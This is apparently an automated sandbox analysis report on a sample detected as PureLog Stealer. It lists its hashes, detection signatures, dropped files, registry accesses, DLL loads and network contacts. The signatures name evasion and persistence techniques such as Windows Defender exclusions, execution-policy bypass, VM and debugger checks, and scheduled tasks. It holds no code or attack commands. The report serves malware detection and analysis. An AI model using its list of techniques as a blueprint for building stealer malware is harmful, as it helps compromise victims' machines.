Automated Malware Analysis Management Report for JWQgbclQK5

Overview

General Information

Sample name:	JWQgbclQK5 renamed because original name is a hash value
Original sample name:	148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Analysis ID:	1417308
MD5:	41bf2693033eaed432dfa5c1d75cdeec
SHA1:	ff038cb9e992a518106c80868176785e987c301d
SHA256:	148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Infos:

Detection

PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected PureLog Stealer

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Drops executables to the windows directory (C:\Windows) and starts them

Drops large PE files

Modifies Windows Defender protection settings

Query firmware table information (likely to detect VMs)

Sigma detected: Disable Important Scheduled Task

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Msiexec Initiated Connection

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious MsiExec Embedding Parent

Sleep loop found (likely to delay execution)

Tries to load missing DLLs

Uses 32bit PE files

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: JWQgbclQK5

ReversingLabs: Detection: 69%

Uses 32bit PE files

Source: JWQgbclQK5

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\License.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\LICENSE.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\wrap-ansi\node_modules\emoji-regex\LICENSE-MIT.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\readme.txt

Source: unknown

HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49711 version: TLS 1.2

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\lib
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: raw.githubusercontent.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49711 version: TLS 1.2

System Summary

Drops large PE files

Source: C:\Windows\SysWOW64\msiexec.exe

File dump: SurrogateServerIntoSvc.exe.35.dr 253000000

Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\40c089.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC210.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC26F.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC28F.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC2BF.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC2DF.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC30F.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF839.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF869.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF889.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C}
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI963.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI964.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9B3.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F3.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA22.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBC9.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC28.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC48.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI12E1.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1311.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI20CD.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\40c08c.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\40c08c.msi
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI551D.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI554D.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBF81.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBF92.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBFC2.tmp
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC2C0.tmp

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIC210.tmp

Tries to load missing DLLs

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: winmm.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: samcli.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: sfc.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: lpk.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msihnd.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: atlthunk.dll
